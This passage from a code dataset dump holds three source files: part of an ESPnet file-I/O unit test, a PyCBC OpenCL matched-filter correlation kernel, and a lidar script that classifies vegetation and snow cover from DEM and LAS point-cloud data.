array2}\n target = NpyScpReader(p)\n\n for k in desired:\n t = target[k]\n d = desired[k]\n np.testing.assert_array_equal(t, d)\n\n assert len(target) == len(desired)\n assert \"abc\" in target\n assert \"def\" in target\n assert tuple(target.keys()) == tuple(desired)\n assert tuple(target) == tuple(desired)\n assert target.get_path(\"abc\") == str(npy_path1)\n assert target.get_path(\"def\") == str(npy_path2)\n\n\ndef test_NpyScpWriter(tmp_path: Path):\n array1 = np.random.randn(1)\n array2 = np.random.randn(1, 1, 10)\n with NpyScpWriter(tmp_path, tmp_path / \"feats.scp\") as writer:\n writer[\"abc\"] = array1\n writer[\"def\"] = array2\n target = NpyScpReader(tmp_path / \"feats.scp\")\n desired = {\"abc\": array1, \"def\": array2}\n\n for k in desired:\n t = target[k]\n d = desired[k]\n np.testing.assert_array_equal(t, d)\n\n assert writer.get_path(\"abc\") == str(tmp_path / \"abc.npy\")\n assert writer.get_path(\"def\") == str(tmp_path / \"def.npy\")\n","sub_path":"test/espnet2/utils/test_fileio.py","file_name":"test_fileio.py","file_ext":"py","file_size_in_byte":7928,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"646172271","text":"# Copyright (C) 2012 Alex Nitz\n# This program is free software; you can redistribute it and/or modify it\n# under the terms of the GNU General Public License as published by the\n# Free Software Foundation; either version 3 of the License, or (at your\n# option) any later version.\n#\n# This program is distributed in the hope that it will be useful, but\n# WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General\n# Public License for more details.\n#\n# You should have received a copy of the GNU General Public License along\n# with this program; if not, write to the Free Software Foundation, Inc.,\n# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.\n\n\n#\n# =============================================================================\n#\n# Preamble\n#\n# =============================================================================\n#\n\nfrom pyopencl.elementwise import ElementwiseKernel\nfrom pytools import match_precision\nfrom pyopencl.tools import context_dependent_memoize, dtype_to_ctype\nfrom pyopencl.array import _get_common_dtype\nfrom pycbc.scheme import mgr\nimport numpy\n\n@context_dependent_memoize\ndef get_correlate_kernel(dtype_x, dtype_y,dtype_out):\n if dtype_x == numpy.complex64:\n op = \"z[i] = cfloat_mul(cfloat_conj(x[i]), y[i])\"\n elif dtype_x == numpy.complex128:\n op = \"z[i] = cdouble_mul(cdouble_conj(x[i]), y[i])\"\n return ElementwiseKernel(mgr.state.context,\n \"%(tp_x)s *x, %(tp_y)s *y, %(tp_z)s *z\" % {\n \"tp_x\": dtype_to_ctype(dtype_x),\n \"tp_y\": dtype_to_ctype(dtype_y),\n \"tp_z\": dtype_to_ctype(dtype_out),\n },\n op,\n \"correlate\")\n\ndef correlate(a, b, out, stream=None):\n dtype_out = _get_common_dtype(a, b, mgr.state.queue)\n krnl = get_correlate_kernel(a.dtype, b.dtype, dtype_out)\n krnl(a.data, b.data, out.data)\n\n\n\n\n","sub_path":"pycbc/filter/matchedfilter_opencl.py","file_name":"matchedfilter_opencl.py","file_ext":"py","file_size_in_byte":1980,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"25433374","text":"import laspy as ls\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nfrom osgeo import gdal, ogr, osr\nfrom mpl_toolkits.mplot3d import Axes3D\nimport csv\nimport os\nimport rasterio\n\ntest_flag=True\n\n#%% functions\nelevationMissNoS0f = 1900.\n\ndef readPlotDEM(filename,elevationMissNo):#,pathName\n demset = gdal.Open(filename)\n band = demset.GetRasterBand(1)\n elevation = band.ReadAsArray()\n elevation[elevation == -9999.] = elevationMissNo\n elevation[elevation > 100000] = elevationMissNo\n \n# x0, dx, dxdy, y0, dydx, dy = demset.GetGeoTransform()\n# nrows, ncols = elevation.shape\n# x1 = x0 + dx * ncols\n# y1 = y0 + dy * nrows\n# extent=[x0, x1, y1, y0]\n \n# plt.figure(figsize=(30,20))\n# plt.imshow(elevation, cmap='gist_earth', extent=extent)\n# plt.savefig(pathName)\n \n return elevation\n\ndef readDEMt0findBoundray(filename,elevationMissNo,pathName):\n demset = gdal.Open(filename)\n band = demset.GetRasterBand(1)\n elevation = band.ReadAsArray()\n elevation[elevation == -9999.] = elevationMissNo\n elevation[elevation > 100000] = elevationMissNo\n \n x0, dx, dxdy, y0, dydx, dy = demset.GetGeoTransform()\n nrows, ncols = elevation.shape\n x1 = x0 + dx * ncols\n y1 = y0 + dy * nrows\n extent=[x0, x1, y1, y0]\n \n return extent\n\ndef creatingCentroidGroundpointsFromDem(tiffFilename,elevationMissNo):#,pathNameforDemImage):\n demset = gdal.Open(tiffFilename)\n band = demset.GetRasterBand(1)\n elevation = band.ReadAsArray()\n elevation[elevation == -9999.] = elevationMissNo\n elevation[elevation > 10000.] = elevationMissNo\n\n x0, dx, dxdy, y0, dydx, dy = demset.GetGeoTransform()\n nrows, ncols = elevation.shape\n \n latitude =[]\n for x in range (ncols):\n latitude.append(x+x0)\n longitude = []\n for y in range (nrows):\n longitude.append(y0-y)\n \n latitude_rp = np.tile(latitude, nrows)\n longitude_rp = np.repeat(longitude, ncols)\n elevation_rp = np.reshape(elevation,(nrows*ncols)).T\n dem_groundPoints = np.vstack([latitude_rp,longitude_rp,elevation_rp]).T\n \n dem_groundPoints_df0 = pd.DataFrame(dem_groundPoints,columns=['x','y','z'])\n dem_groundPoints_df = pd.concat([dem_groundPoints_df0[['x','y']].astype(int),dem_groundPoints_df0['z']], axis=1)\n dem_groundPoints_df.sort_values(by=['x','y'],inplace=True)\n dem_groundPoints_df.index=np.arange(0,len(dem_groundPoints_df))\n \n return dem_groundPoints,dem_groundPoints_df\n\ndef creatingLatituteLongitudeFromDem(tiffFilename,elevationMissNo):#,pathNameforDemImage):\n demset = gdal.Open(tiffFilename)\n band = demset.GetRasterBand(1)\n elevation = band.ReadAsArray()\n elevation[elevation == -9999.] = elevationMissNo\n elevation[elevation > 10000.] = elevationMissNo\n\n x0, dx, dxdy, y0, dydx, dy = demset.GetGeoTransform()\n nrows, ncols = elevation.shape\n \n latitude =[]\n for x in range (ncols):\n latitude.append(x+x0)\n longitude = []\n for y in range (nrows):\n longitude.append(y0-y)\n \n latitude_rp = np.tile(latitude, nrows)\n longitude_rp = np.repeat(longitude, ncols)\n \n return latitude_rp, longitude_rp, nrows, ncols\n\ndef cutPart0fMapSort(points_df,minX,maxX,minY,maxY):\n points_df_int = points_df[(points_df['x'] >= minX) & (points_df['x'] <= maxX)]\n points_df_int_sp0 = points_df_int[(points_df_int['y'] >= minY) & (points_df_int['y'] <= maxY)]\n #points_df_int_sp = points_df_int_sp0.values\n points_df_sp_intg = pd.concat([points_df_int_sp0[['x','y']].astype(int),points_df_int_sp0['z']], axis=1)\n points_df_sp_intg.sort_values(by=['x','y'],inplace=True)\n points_df_sp_intg.index=np.arange(0,len(points_df_sp_intg))\n \n return points_df_sp_intg\n\ndef cutPart0fMap(arry,minX,maxX,minY,maxY):\n arry_df = pd.DataFrame(arry)\n points_df_int = arry_df[(arry_df[0] >= minX) & (arry_df[0] <= maxX)]\n points_df_int_sp0 = points_df_int[(points_df_int[1] >= minY) & (points_df_int[1] <= maxY)]\n points_df_sp_intg = pd.concat([points_df_int_sp0], axis=1)\n points_df_sp_intg.index=np.arange(0,len(points_df_sp_intg))\n \n return points_df_sp_intg\n\ndef readLasFile (lasFilePath):\n infile = ls.file.File(lasFilePath, mode=\"r\")\n coords = np.vstack((infile.x, infile.y, infile.z)).T\n coords_df0 = pd.DataFrame(coords,columns=['x','y','z'])\n coords_df = pd.concat([coords_df0[['x','y']].astype(int),coords_df0['z']], axis=1)\n coords_df.sort_values(by=['x','y'],inplace=True)\n coords_df.index=np.arange(0,len(coords_df)) \n \n return coords_df\n\ndef calculatingUpGroundPoints (coords_df,dem_groundPoints_df,ncols):\n print(\"please wait ...\")\n coords_bnry = np.vstack([coords_df['x']-np.min(coords_df['x']),coords_df['y']-np.min(coords_df['y']),coords_df['z']]).T\n coords_bnry_df = pd.DataFrame(coords_bnry,columns=['x','y','z'])\n N=len(coords_bnry_df)\n M=len(dem_groundPoints_df)\n print(\"total length: %s\" %N)\n upGroundPoints = [0]*N\n nn=0\n min_x=np.min(coords_df['x'])\n min_y=np.min(coords_df['y'])\n z=dem_groundPoints_df['z']\n for row in coords_bnry_df.itertuples():\n if nn%100000==0:\n print (\"processed %s\" %nn)\n \n indx = row.y + row.x*(ncols)\n \n if indx<M:\n upG = row.z-z[indx] # dem_groundPoints_df['z'][indx]\n else:\n upG = row.z-z[M-1]\n \n upGroundPoints[nn]=[row.x+min_x,row.y+min_y,upG]\n nn+=1\n return upGroundPoints\n\ndef createClassIndexBasedDF(pointFile,ncol):\n pointFile_df0 = pd.DataFrame(pointFile,columns=['x','y','z'])\n pointFile_df = pd.concat([pointFile_df0[['x','y']].astype(int),pointFile_df0['z']], axis=1)\n minX = np.min(pointFile_df['x'])\n minY = np.min(pointFile_df['y'])\n pointFile_indx_DF = np.vstack([pointFile_df['x']-minX,pointFile_df['y']-minY,pointFile_df['z']]).T\n pointFile_indx = pointFile_indx_DF[:,1]+ncol*pointFile_indx_DF[:,0]\n pointFile_df.index = pointFile_indx.astype(int)\n return pointFile_indx, pointFile_df\n \ndef defineSpecificClassGreater(classesG, specific0bjectHeightG):\n specificClassG = []\n for row in classesG.itertuples():\n if row.z>specific0bjectHeightG:\n specificClassG.append(row)\n return specificClassG\n\ndef defineSpecificClassLess (classesL, specific0bjectHeightL):\n specificClassL = []\n for row in classesL.itertuples():\n if row.z<specific0bjectHeightL:\n specificClassL.append(row)\n return specificClassL\n\ndef defineLowVegClass2(classes):\n lowVegClass = []\n for row in classes.itertuples():\n if row.z<=2 and row.z>=0.15:\n lowVegClass.append(row)\n return lowVegClass\n\ndef differenceBetwee2classes (primaryClass,secondNumClass): #to define nolowVegClass and openClass\n primaryNumClass = list(np.arange(len(primaryClass)))\n cleanNumClass = list(set(primaryNumClass)-set(secondNumClass))\n cleanClass = []\n for indx in cleanNumClass:\n cleanClass.append(primaryClass[indx])\n return cleanClass, cleanNumClass\n\ndef calculatingSlopeAspectNorthness(demFilename,slopeFileName,aspectFileName,elevation,nrows,ncols,lat,Long):\n gdal.DEMProcessing(slopeFileName, demFilename, 'slope')\n with rasterio.open(slopeFileName) as datasets1:\n slope=datasets1.read(1) #slope in degree\n slope_rad = slope * 0.0174533 #slope in radian\n slope_sin = np.sin(slope_rad)\n\n gdal.DEMProcessing(aspectFileName, demFilename, 'aspect')\n with rasterio.open(aspectFileName) as dataseta:\n aspect=dataseta.read(1)\n aspect_rad = aspect * 0.0174533\n aspect_cos = np.cos(aspect_rad)\n\n northness=aspect_cos*slope_sin\n northness_col = np.reshape(northness,(nrows*ncols)).T\n elevation_col = np.reshape(elevation,(nrows*ncols)).T\n slope_col = np.reshape(slope,(nrows*ncols)).T\n elevNrth_gp = np.vstack([lat,Long,northness_col,elevation_col]).T\n index_ls = np.vstack([lat,Long,northness_col,elevation_col,slope_col,elevation_col]).T\n# index_ls_no30 = index_ls[index_ls[:,4]<30]\n return elevNrth_gp, index_ls\n\n#classification with northeness and elevation index\ndef classificationNorthnessElev(index_ls,nrth1,nrth2,elev1,elev2,ncol,minX,minY):#0.25\n index_ls[:,4][(index_ls[:,2]<nrth1)&(index_ls[:,3]<elev1)]=11\n index_ls[:,4][(index_ls[:,2]>nrth2)&(index_ls[:,3]<elev1)]=31\n index_ls[:,4][(index_ls[:,2]<=nrth2)&(index_ls[:,2]>=nrth1)&(index_ls[:,3]<elev1)]=21\n index_ls[:,4][(index_ls[:,2]<nrth1)&(index_ls[:,3]>elev2)]=13\n index_ls[:,4][(index_ls[:,2]>nrth2)&(index_ls[:,3]>elev2)]=33\n index_ls[:,4][(index_ls[:,2]<=nrth2)&(index_ls[:,2]>=nrth1)&(index_ls[:,3]>elev2)]=23\n index_ls[:,4][(index_ls[:,2]<nrth1)&(index_ls[:,3]>=elev1)&(index_ls[:,3]<=elev2)]=12\n index_ls[:,4][(index_ls[:,2]>nrth2)&(index_ls[:,3]>=elev1)&(index_ls[:,3]<=elev2)]=32\n index_ls[:,4][(index_ls[:,2]<=nrth2)&(index_ls[:,2]>=nrth1)&(index_ls[:,3]>=elev1)&(index_ls[:,3]<=elev2)]=22\n\n pointFile_df = pd.DataFrame(index_ls,columns=['x','y','z','idx','Index','extra'])\n indx_DF = np.vstack([pointFile_df['x']-minX,pointFile_df['y']-minY]).T\n pointFile_indx = (indx_DF[:,1]+ncol*indx_DF[:,0]).astype(int)\n index_ls[:,5] = pointFile_indx\n \n exposed_lowElev = index_ls[index_ls[:,4]==11]\n exposed_lowElev_df = pd.DataFrame(exposed_lowElev,columns = ['x','y','n','e','idx','Index'])\n nuetral_lowElev = index_ls[index_ls[:,4]==21]\n nuetral_lowElev_df = pd.DataFrame(nuetral_lowElev,columns = ['x','y','n','e','idx','Index'])\n sheltered_lowElev = index_ls[index_ls[:,4]==31]\n sheltered_lowElev_df = pd.DataFrame(sheltered_lowElev,columns = ['x','y','n','e','idx','Index'])\n exposed_midElev = index_ls[index_ls[:,4]==12]\n exposed_midElev_df = pd.DataFrame(exposed_midElev,columns = ['x','y','n','e','idx','Index'])\n nuetral_midElev = index_ls[index_ls[:,4]==22]\n nuetral_midElev_df = pd.DataFrame(nuetral_midElev,columns = ['x','y','n','e','idx','Index'])\n sheltered_midElev = index_ls[index_ls[:,4]==32]\n sheltered_midElev_df = pd.DataFrame(sheltered_midElev,columns = ['x','y','n','e','idx','Index'])\n exposed_hiElev = index_ls[index_ls[:,4]==13]\n exposed_hiElev_df = pd.DataFrame(exposed_hiElev,columns = ['x','y','n','e','idx','Index'])\n nuetral_hiElev = index_ls[index_ls[:,4]==23]\n nuetral_hiElev_df = pd.DataFrame(nuetral_hiElev,columns = ['x','y','n','e','idx','Index'])\n sheltered_hiElev = index_ls[index_ls[:,4]==33]\n sheltered_hiElev_df = pd.DataFrame(sheltered_hiElev,columns = ['x','y','n','e','idx','Index'])\n \n topo_dimension = {'sl':sheltered_lowElev_df,'nl':nuetral_lowElev_df,'el':exposed_lowElev_df,\n 'sm':sheltered_midElev_df,'nm':nuetral_midElev_df,'em':exposed_midElev_df,\n 'sh':sheltered_hiElev_df,'nh':nuetral_hiElev_df,'eh':exposed_hiElev_df}\n return topo_dimension\n\n#%% dem snow off (veg) for vcm\n#if test_flag is False: \nfilenameS0fvcm = \"G:/hhs_DST/lidar_analysis/sagehen/dem2014snow0ff.tif\"\nelevationVegvcm = readPlotDEM(filenameS0fvcm,elevationMissNoS0f)#,pathNameS0fvcm\n\ndem_groundPointsVegVcm, dem_groundPointsVegVcm_df = creatingCentroidGroundpointsFromDem(filenameS0fvcm,elevationMissNoS0f)#,pathNameS)\nlat_vcm, long_vcm, nrows_vcm, ncols_vcm = creatingLatituteLongitudeFromDem(filenameS0fvcm,elevationMissNoS0f)\n\n#calculating slope, aspect, northnes\nelevNrth_gp_vcm, index_vcm = calculatingSlopeAspectNorthness(filenameS0fvcm,\n 'G:/hhs_DST/lidar_analysis/sagehen/slopeSc.tif',\n 'G:/hhs_DST/lidar_analysis/sagehen/aspectSc.tif',\n elevationVegvcm,nrows_vcm,ncols_vcm,lat_vcm,long_vcm)\nindex_vcm[:,4][(index_vcm[:,4]==-9999.)]=31\nindex_noG30 = index_vcm[(index_vcm[:,4]<30.)] #slope less than 30\n\n#index_elevG2170 = index_noG30[(index_noG30[:,3]>2170.)] #slope less than 30\n#filename_slope = \"G:/hhs_DST/lidar_analysis/sagehen/slopeSc.tif\"\n#slope_degree = readPlotDEM(filename_slope,0)\n\n#las file snow off (snw) for vcm\nlasFilePath_vegVcm1 = \"G:/hhs_DST/lidar_analysis/sagehen/points1.las\"\ncoordsVegVcm_df1 = readLasFile (lasFilePath_vegVcm1)\nlasFilePath_vegVcm2 = \"G:/hhs_DST/lidar_analysis/sagehen/points2.las\"\ncoordsVegVcm_df2 = readLasFile (lasFilePath_vegVcm2)\nlasFilePath_vegVcm3 = \"G:/hhs_DST/lidar_analysis/sagehen/points3.las\"\ncoordsVegVcm_df3 = readLasFile (lasFilePath_vegVcm3)\nlasFilePath_vegVcm4 = \"G:/hhs_DST/lidar_analysis/sagehen/points4.las\"\ncoordsVegVcm_df4 = readLasFile (lasFilePath_vegVcm4)\ncoordsVegVcm_df = pd.concat([coordsVegVcm_df4,coordsVegVcm_df2,coordsVegVcm_df1,coordsVegVcm_df3])\n\n#las file snow on (snw) for vcm\n#from LiDar_DemBasedClassification_scSnow0n import coordsnow0nSc18Y\nfrom LiDar_DemBasedClassification_scSnow0n import coordsnow0nSc17A\n#from LiDar_DemBasedClassification_scSnow0n import coordsnow0nSc26M\n\ncoordsSnwVcm_df = coordsnow0nSc17A.copy()\ncoordsSnwVcm_df['z'] = coordsSnwVcm_df['z']-0.26\n\n#cutting some part of dem map\nminXVcm = np.max([np.min(dem_groundPointsVegVcm_df['x']),np.min(coordsSnwVcm_df['x']),np.min(coordsVegVcm_df['x'])]) \nmaxXVcm = np.min([np.max(dem_groundPointsVegVcm_df['x']),np.max(coordsSnwVcm_df['x']),np.max(coordsVegVcm_df['x'])])#minXVcm+2000\nminYVcm = np.max([np.min(dem_groundPointsVegVcm_df['y']),np.min(coordsSnwVcm_df['y']),np.min(coordsVegVcm_df['y'])])#3971000-1500\nmaxYVcm = np.min([np.max(dem_groundPointsVegVcm_df['y']),np.max(coordsSnwVcm_df['y']),np.max(coordsVegVcm_df['y'])])#minYVcm+2000\n\ndem_groundPointsVegVcm_intg = cutPart0fMapSort(dem_groundPointsVegVcm_df,minXVcm,maxXVcm,minYVcm,maxYVcm).astype(int)\ncoordsVegVcm_intg = cutPart0fMapSort(coordsVegVcm_df,minXVcm,maxXVcm,minYVcm,maxYVcm)\ncoordsSnwVcm_intg = cutPart0fMapSort(coordsSnwVcm_df,minXVcm,maxXVcm,minYVcm,maxYVcm)\nindexVcm_cut = cutPart0fMap(index_noG30,minXVcm,maxXVcm,minYVcm,maxYVcm)\n\nnewNcols = maxYVcm - minYVcm + 1\n#calculating topo_dimension from cut northness\nparams = [-0.10,0.10,2050,2400]\ntopo_dimension_vcm = classificationNorthnessElev(indexVcm_cut.values,params[0],params[1],params[2],params[3],newNcols,minXVcm,minYVcm)\n\n#elevLim = 2650\n#higher_elevLim_index = dem_groundPointsVegVcm_intg[dem_groundPointsVegVcm_intg['z']>elevLim].index\n\n#%% classification with grountpoints from veg dem file :VCM\nupGroundPointsVegVcm = calculatingUpGroundPoints (coordsVegVcm_intg,dem_groundPointsVegVcm_intg,newNcols)\n#classification of snow las file with veg_grountpoints\nupGroundPointsSnwVegVcm = calculatingUpGroundPoints (coordsSnwVcm_intg,dem_groundPointsVegVcm_intg,newNcols)\n\npath2npoutVeg=\"G:/hhs_DST/lidar_analysis/sagehen/upGroundPointsVegSc17A.npy\"\nnp.save(path2npoutVeg,upGroundPointsVegVcm) \nupLoadUpGroundPointsVeg=np.load(path2npoutVeg)\n\npath2npoutSnw=\"G:/hhs_DST/lidar_analysis/sagehen/upGroundPointsSnwSc17A.npy\"\nnp.save(path2npoutSnw,upGroundPointsSnwVegVcm) \nupLoadUpGroundPointsSnw=np.load(path2npoutSnw)\n\n#%% vegtation classification from DEM2010 and las2010 snow off\nvegClassVcm = upGroundPointsVegVcm[:]#upLoadUpGroundPointsVeg.copy()\nvegClassVcm_indx, vegClassVcm_df = createClassIndexBasedDF(vegClassVcm,newNcols)\n\n#all tree classification based on veg dem\nallTreeReturnVcm_df = pd.DataFrame(defineSpecificClassGreater (vegClassVcm_df, 2))\nallTreeReturnVcm_indx = pd.DataFrame((allTreeReturnVcm_df['Index'].astype(int)).drop_duplicates(keep=\"first\", inplace=False))\n\n#finding pixels that have trees\nallTreeClassVcm_df = vegClassVcm_df.loc[allTreeReturnVcm_indx['Index']]\npath3npoutSnw=\"G:/hhs_DST/lidar_analysis/sagehen/allTreeClassSc17A.npy\"\nnp.save(path3npoutSnw,allTreeClassVcm_df) \n \n# trees with low branches\nlowVegTreeClassVcm = pd.DataFrame(defineLowVegClass2(allTreeClassVcm_df))\n\nlowVegTreeClassVcm_indx = pd.DataFrame((lowVegTreeClassVcm['Index'].astype(int)).drop_duplicates(keep=\"first\", inplace=False))\n\n# trees with no low branches (excluding all pixels that have low blanches, pixels that have a no low branches)\nallTreeClassNoLowVegVcm_indx = (pd.concat([allTreeReturnVcm_indx,lowVegTreeClassVcm_indx])).drop_duplicates(keep=False, inplace=False)\nallTreeClassNoLowVegVcm_df = allTreeClassVcm_df.loc[allTreeClassNoLowVegVcm_indx['Index']]\npath4npoutSnw=\"G:/hhs_DST/lidar_analysis/sagehen/allTreeClassNoLowVegSc17A.npy\"\nnp.save(path4npoutSnw,allTreeClassNoLowVegVcm_df) \n\n#testing tree with no low branch class\nallTreeClassNoLowVeg_test1 = allTreeClassNoLowVegVcm_df[((allTreeClassNoLowVegVcm_df['z']<0.15))]\nallTreeClassNoLowVeg_test1_pixle = allTreeClassNoLowVeg_test1[['x','y']].drop_duplicates(keep='first', inplace=False)\nallTreeClassNoLowVeg_pixle_indx = np.vstack([allTreeClassNoLowVeg_test1_pixle['x']-minXVcm,allTreeClassNoLowVeg_test1_pixle['y']-minYVcm]).T\npointFile_indx1 = allTreeClassNoLowVeg_pixle_indx[:,1]+newNcols*allTreeClassNoLowVeg_pixle_indx[:,0]\n\nallTreeClassNoLowVeg_test2 = allTreeClassNoLowVegVcm_df[((allTreeClassNoLowVegVcm_df['z']>2))]\nallTreeClassNoLowVeg_test2_pixle = allTreeClassNoLowVeg_test2[['x','y']].drop_duplicates(keep='first', inplace=False)\nallTreeClassNoLowVeg_pixle_indx2 = np.vstack([allTreeClassNoLowVeg_test2_pixle['x']-minXVcm,allTreeClassNoLowVeg_test2_pixle['y']-minYVcm]).T\npointFile_indx2 = allTreeClassNoLowVeg_pixle_indx2[:,1]+newNcols*allTreeClassNoLowVeg_pixle_indx2[:,0]\n\nset(pointFile_indx1) < set(pointFile_indx2)\n\n#all UTen classification based on veg dem\nall0penClassVcm = (pd.concat([vegClassVcm_df,allTreeClassVcm_df])).drop_duplicates(keep=False, inplace=False)\nall0penClassVcm_indx = ((pd.DataFrame(all0penClassVcm.index)).astype(int)).drop_duplicates(keep='first', inplace=False)\n# 0pen with low branches\nlowVeg0penClassVcm = pd.DataFrame(defineLowVegClass2(all0penClassVcm))\nlowVeg0penClassVcm.index = lowVeg0penClassVcm['Index']\n\n# 0pen with no grass (excluding all pixels that have low blanches from open)\nall0penClassNoGrass_indx = (pd.concat([lowVeg0penClassVcm['Index'],all0penClassVcm_indx[0]])).drop_duplicates(keep=False, inplace=False)\nall0penClassNoGrass_df = all0penClassVcm.loc[all0penClassNoGrass_indx]\npath5npoutSnw=\"G:/hhs_DST/lidar_analysis/sagehen/all0penClassNoGrassSc17A.npy\"\nnp.save(path5npoutSnw,all0penClassNoGrass_df) \n\nall0penClassNoGrass_df_fail = all0penClassNoGrass_df[(all0penClassNoGrass_df['z']>0.15)]\n#%% snow classification from DEM2010 (snow off) and las2010 snow on \nsnowClassVcm = upGroundPointsSnwVegVcm[:] #upLoadUpGroundPointsSnw.copy()\nsnowClassVcm_indx, snowClassVcm_df = createClassIndexBasedDF(snowClassVcm,newNcols)\n\n# tree snow pixcels that do not have a low branch\nallSnowNoLowVegClassVcm_df = (snowClassVcm_df.loc[allTreeClassNoLowVegVcm_indx['Index'].values]).dropna()\npath6npoutSnw=\"G:/hhs_DST/lidar_analysis/sagehen/allSnowNoLowVegClassSc17A.npy\"\nnp.save(path6npoutSnw,allSnowNoLowVegClassVcm_df)\n\n# snow under canopy\n#groupby_mean = allSnowNoLowVegClassVcm_df.groupby(['x','y']).mean()\n\nallSnowUnderTreeClassVcm_df0 = pd.DataFrame(defineSpecificClassLess (allSnowNoLowVegClassVcm_df, 2))\nallSnowUnderTreeClassVcm_df0.index = allSnowUnderTreeClassVcm_df0['Index']\nallSnowUnderTreeClassVcm_df = pd.DataFrame(defineSpecificClassGreater (allSnowUnderTreeClassVcm_df0[['x','y','z']], 0.15))\nallSnowUnderTreeClassVcm_df.index = allSnowUnderTreeClassVcm_df['Index']\npath7npoutSnw=\"G:/hhs_DST/lidar_analysis/sagehen/allsnowUnderTreeClassSc17A.npy\"\nnp.save(path7npoutSnw,allSnowUnderTreeClassVcm_df)\n\nallNoSnowUnderTreeClassVcm_df0 = pd.DataFrame(defineSpecificClassLess (allSnowUnderTreeClassVcm_df0[['x','y','z']], 0.15))\nallNoSnowUnderTreeClassVcm_df0.index = allNoSnowUnderTreeClassVcm_df0['Index']\nallNoSnowUnderTreeClassVcm_df = pd.DataFrame(defineSpecificClassGreater (allNoSnowUnderTreeClassVcm_df0[['x','y','z']], -0.3))\nallNoSnowUnderTreeClassVcm_df.index = allNoSnowUnderTreeClassVcm_df['Index']\n\n#test snow under the trees (finding duplicates)\nallSnowUnderTreeClassVcm_df_pix = allSnowUnderTreeClassVcm_df[['x','y']].drop_duplicates(keep='first', inplace=False)\nallNoSnowUnderTreeClassVcm_df_pix = allNoSnowUnderTreeClassVcm_df[['x','y']].drop_duplicates(keep='first', inplace=False)\nconcat2DF = pd.concat([allSnowUnderTreeClassVcm_df_pix,allNoSnowUnderTreeClassVcm_df_pix])\nconcat2DF[\"is_duplicate\"]= concat2DF.duplicated()\n#indexing\nSnowUnderTreeDuplicate_indx = (pd.DataFrame(((concat2DF[(concat2DF[\"is_duplicate\"] == True)]).index).values)).drop_duplicates(keep='first', inplace=False)\nallSnowUnderTreeClassVcm_indx = (pd.DataFrame((allSnowUnderTreeClassVcm_df.index).values)).drop_duplicates(keep='first', inplace=False)\nallNoSnowUnderTreeClassVcm_indx = (pd.DataFrame(allNoSnowUnderTreeClassVcm_df.index.values)).drop_duplicates(keep='first', inplace=False)\n\n#final snow under the tree and no snow under tree pixels\nSnowUnderTreePix_indx = (pd.concat([SnowUnderTreeDuplicate_indx,allSnowUnderTreeClassVcm_indx])).drop_duplicates(keep=False, inplace=False) #no duplicate\nSnowUnderTreeClassVcm_df = allSnowUnderTreeClassVcm_df.copy() #allSnowUnderTreeClassVcm_df.loc[SnowUnderTreePix_indx[0].values] #with duplicate\n\nNoSnowUnderTreePix_indx = (pd.concat([SnowUnderTreeDuplicate_indx,allNoSnowUnderTreeClassVcm_indx])).drop_duplicates(keep=False, inplace=False)\nNoSnowUnderTreeClassVcm_df = allNoSnowUnderTreeClassVcm_df.loc[NoSnowUnderTreePix_indx[0].values]\npath8npoutSnw=\"G:/hhs_DST/lidar_analysis/sagehen/allNoSnowUnderTreeClassSc17A.npy\"\nnp.save(path8npoutSnw,NoSnowUnderTreeClassVcm_df)\n#%% #snow on the ground with no Grass\nallSnow0penGroundClassVcm_df0 = (snowClassVcm_df.loc[all0penClassNoGrass_df.index.drop_duplicates(keep='first')]).dropna()\n#excluding returns with z more than 2m (conflicting pixels)\nallSnow0penGroundClassVcm_df1 = pd.DataFrame(defineSpecificClassLess(allSnow0penGroundClassVcm_df0,5)) \nallSnow0penGroundClassVcm_df1.index = allSnow0penGroundClassVcm_df1['Index']\nallSnow0penGroundClassVcm_df = pd.DataFrame(defineSpecificClassGreater (allSnow0penGroundClassVcm_df1[['x','y','z']], 0.15))\nallSnow0penGroundClassVcm_df.index = allSnow0penGroundClassVcm_df['Index']\npath9npoutSnw=\"G:/hhs_DST/lidar_analysis/sagehen/allSnow0penGroundClassSc17A.npy\"\nnp.save(path9npoutSnw,allSnow0penGroundClassVcm_df)\n\n#no snow on the ground\nallNoSnow0penClassVcm0 = pd.DataFrame(defineSpecificClassLess (allSnow0penGroundClassVcm_df1[['x','y','z']], 0.15))\nallNoSnow0penClassVcm0.index = allNoSnow0penClassVcm0['Index']\nallNoSnow0penClassVcm = pd.DataFrame(defineSpecificClassGreater (allNoSnow0penClassVcm0[['x','y','z']], -0.3))\nallNoSnow0penClassVcm.index = allNoSnow0penClassVcm['Index']\n\n#finding duplicates for snow in 0pen sites\nallSnow0penClassVcm_df_pix = allSnow0penGroundClassVcm_df[['x','y']].drop_duplicates(keep='first', inplace=False)\nallNoSnow0penClassVcm_df_pix = allNoSnow0penClassVcm[['x','y']].drop_duplicates(keep='first', inplace=False)\nconcat2DF2 = pd.concat([allSnow0penClassVcm_df_pix,allNoSnow0penClassVcm_df_pix])\nconcat2DF2[\"is_duplicate\"]= concat2DF2.duplicated()\n#indexing\nSnow0penDuplicate_indx = (pd.DataFrame(((concat2DF2[(concat2DF2[\"is_duplicate\"] == True)]).index).values)).drop_duplicates(keep='first', inplace=False)\nallSnow0penClassVcm_indx = (pd.DataFrame((allSnow0penGroundClassVcm_df.index).values)).drop_duplicates(keep='first', inplace=False)\nallNoSnow0penClassVcm_indx = (pd.DataFrame(allNoSnow0penClassVcm.index.values)).drop_duplicates(keep='first', inplace=False)\n\n#final snow in 0pen sites and no snow in 0pen sites\nSnow0penPix_indx = (pd.concat([Snow0penDuplicate_indx,allSnow0penClassVcm_indx])).drop_duplicates(keep=False, inplace=False)\nSnow0penClassVcm_df = allSnow0penGroundClassVcm_df.copy() #allSnow0penGroundClassVcm_df.loc[Snow0penPix_indx[0].values]\n\nNoSnow0penPix_indx = (pd.concat([Snow0penDuplicate_indx,allNoSnow0penClassVcm_indx])).drop_duplicates(keep=False, inplace=False)\nNoSnow0penClassVcm_df = allNoSnow0penClassVcm.loc[NoSnow0penPix_indx[0].values]\npath10npoutSnw=\"G:/hhs_DST/lidar_analysis/sagehen/allNoSnow0penClassSc17A.npy\"\nnp.save(path10npoutSnw,NoSnow0penClassVcm_df)\n\n#%%fSCA no topography\nUT_snowPixels = 